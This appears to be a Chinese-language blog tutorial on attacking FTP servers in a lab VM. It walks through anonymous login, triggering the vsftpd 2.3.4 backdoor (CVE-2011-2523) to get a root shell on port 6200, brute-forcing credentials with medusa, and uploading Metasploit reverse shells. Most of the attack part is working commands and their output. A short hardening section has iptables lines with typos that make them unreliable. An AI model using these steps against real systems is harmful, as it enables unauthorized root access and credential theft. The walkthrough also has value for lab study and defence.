FTP协议介绍
文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号端口。
用户分类:1、Real用户 2、Administrator 3、匿名用户
FTP文件传输格式:1、ASCII 2、二进制格式
利用FTP匿名登录漏洞
由于FTP没有禁止匿名用户,所以可以直接使用Anonymous用户直接登录FTP服务器。下面演示使用nc连接FTP。
1、使用nmap检查21端口,及扫描漏洞
➜ ~ nmap -p 21 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-08 11:11 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00033s latency).
PORT STATE SERVICE
21/tcp open ftp
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds
2、使用匿名用户登录
➜ ~ nc 10.0.2.5 21
220 (vsFTPd 2.3.4)
USER anonymous
331 Please specify the password.
PASS
230 Login successful.
HELP
214-The following commands are recognized.
ABOR ACCT ALLO APPE CDUP CWD DELE EPRT EPSV FEAT HELP LIST MDTM MKD
MODE NLST NOOP OPTS PASS PASV PORT PWD QUIT REIN REST RETR RMD RNFR
RNTO SITE SIZE SMNT STAT STOR STOU STRU SYST TYPE USER XCUP XCWD XMKD
XPWD XRMD
214 Help OK.
PWD
257 "/"
利用FTP后门漏洞
vsftpd-2.3.4 手工触发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。
1、使用nmap扫描FTP后门漏洞
➜ ~ nmap --script vuln -p 21 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-08 11:41 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00027s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: OSVDB:73573 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| http://osvdb.org/73573
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
|_sslv2-drown:
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds
2、使用nc触发vsftpd-2.3.4后面漏洞
➜ ~ nc 10.0.2.5 21
220 (vsFTPd 2.3.4)
USER user:)
331 Please specify the password.
PASS pass
另外打开一个终端利用该漏洞
➜ ~ nmap -p 6200 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-08 12:17 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00039s latency).
PORT STATE SERVICE
6200/tcp open lm-x
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
➜ ~ nc 10.0.2.5 6200
id
uid=0(root) gid=0(root)
FTP安全配置
1、修改配置文件,禁止匿名用户登录。
windows禁用匿名用户
linux下修改/etc/vsftp.conf:
anonymous_enable=NO
2、对特定漏洞进行打补丁,或者设置防火墙禁止连接后门端口。
iptables -A INPUT -p tcp -dport 6200 -j DROP
iptabels -A OUTPUT -p tcp sport 6200 -j DROP
FTP用户名密码暴力破解
查看medusa支持的破解模块
➜ ~ medusa -d
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
Available modules in "." :
Available modules in "/usr/lib/x86_64-linux-gnu/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
+ http.mod : Brute force module for HTTP : version 2.1
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1
+ smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.1
+ svn.mod : Brute force module for Subversion sessions : version 2.1
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.1
+ web-form.mod : Brute force module for web forms : version 2.1
+ wrapper.mod : Generic Wrapper Module : version 2.0
使用medusa暴力破解FTP
➜ ~ medusa -h 10.0.2.5 -U /root/Desktop/UserAndPass -P /root/Desktop/UserAndPass -M ftp
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ftp] Host: 10.0.2.5 (1 of 1, 0 complete) User: admin (1 of 4, 0 complete) Password: admin (1 of 4 complete)
ACCOUNT CHECK: [ftp] Host: 10.0.2.5 (1 of 1, 0 complete) User: admin (1 of 4, 0 complete) Password: msfadmin (2 of 4 complete)
ACCOUNT CHECK: [ftp] Host: 10.0.2.5 (1 of 1, 0 complete) User: admin (1 of 4, 0 complete) Password: root (3 of 4 complete)
ACCOUNT CHECK: [ftp] Host: 10.0.2.5 (1 of 1, 0 complete) User: admin (1 of 4, 0 complete) Password: toor (4 of 4 complete)
ACCOUNT CHECK: [ftp] Host: 10.0.2.5 (1 of 1, 0 complete) User: msfadmin (2 of 4, 1 complete) Password: admin (1 of 4 complete)
ACCOUNT CHECK: [ftp] Host: 10.0.2.5 (1 of 1, 0 complete) User: msfadmin (2 of 4, 1 complete) Password: msfadmin (2 of 4 complete)
ACCOUNT FOUND: [ftp] Host: 10.0.2.5 User: msfadmin Password: msfadmin [SUCCESS]
FTP用户名明文密码嗅探
FTP协议中用于用户认证的过程中,客户端与服务器端是通过明文进行交互信息。验证FTP登录过程中明文传输用户名和密码。
FTP明文传输
1、利用arpspoof进行ARP嗅探,然后利用Wireshark进行流量嗅探。
没测试成功。待验证。
FTP登录之后做的事情
利用metasploit创建反弹shell上传到FTP服务器。也可以利用setookit快速生成反弹shell。参考文章《Metasploit实战:FTP漏洞利用》
推荐汇总贴: 漏洞利用套路汇总
网友评论